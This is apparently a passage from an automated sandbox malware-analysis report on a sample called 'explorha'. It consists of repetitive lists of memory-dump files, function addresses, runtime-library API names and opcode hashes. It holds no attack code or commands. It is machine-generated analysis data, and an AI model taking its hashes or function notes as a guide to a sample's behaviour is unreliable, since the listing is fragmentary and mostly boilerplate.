                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                      • String ID: eventObject
                                                                                                      • API String ID: 1288476792-1680012138
                                                                                                      • Opcode ID: c93997f0c2cc1333ab58705e645125643f826c4c0a8b4905ebd1967e8a3e2523
                                                                                                      • Instruction ID: 1a59cdd6036972d7aa92de600861f68657351bc9bde0d5b8e6607c2267cd445a
                                                                                                      • Opcode Fuzzy Hash: c93997f0c2cc1333ab58705e645125643f826c4c0a8b4905ebd1967e8a3e2523
                                                                                                      • Instruction Fuzzy Hash: B111C271540208E6DB28F7A8CC46FEE73A8FF01754FA04168B515E61C2EF74EA048765
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088B77E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0088B792
                                                                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0088B7B6
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0088B7C9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pScheduler
                                                                                                      • API String ID: 246774199-923244539
                                                                                                      • Opcode ID: b43bc8cb043be55496daa360bcca8dec94dba39493d2fa30aebfc9bd474db442
                                                                                                      • Instruction ID: 34298ef573ab9fb435c4c96f24176464ec950b023c1f58800be3a88ef9fa689a
                                                                                                      • Opcode Fuzzy Hash: b43bc8cb043be55496daa360bcca8dec94dba39493d2fa30aebfc9bd474db442
                                                                                                      • Instruction Fuzzy Hash: 4EF0B43554070867CB24FA28D852DAEB379FEC0761724452DE416D7286DB74ED06C792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0089E110 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                      • Instruction ID: d5b07ae4540bffbf3c9dc836fe3e5f6872c2b172b861e843d638aaa14b598de3
                                                                                                      • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                                                      • Instruction Fuzzy Hash: 8CB12232A046959FDF11EF68C881BAEBFA5FF56300F2C816AE841DB342D6349D01CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008966DE Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: 71c39fc8e3a8f4272ed89a294f0aec48ebbfe227afab4648f45b2b84c991fb9c
                                                                                                      • Instruction ID: 45ebb693e9e57372111ceb69fdb768bb6ba3b0e0678374062eaf07aeb65dc008
                                                                                                      • Opcode Fuzzy Hash: 71c39fc8e3a8f4272ed89a294f0aec48ebbfe227afab4648f45b2b84c991fb9c
                                                                                                      • Instruction Fuzzy Hash: 8551C072A00606AFDF29AF58C941BAA77A5FF10314F18453DE846E7291FB31ECA0D791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008962A5 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
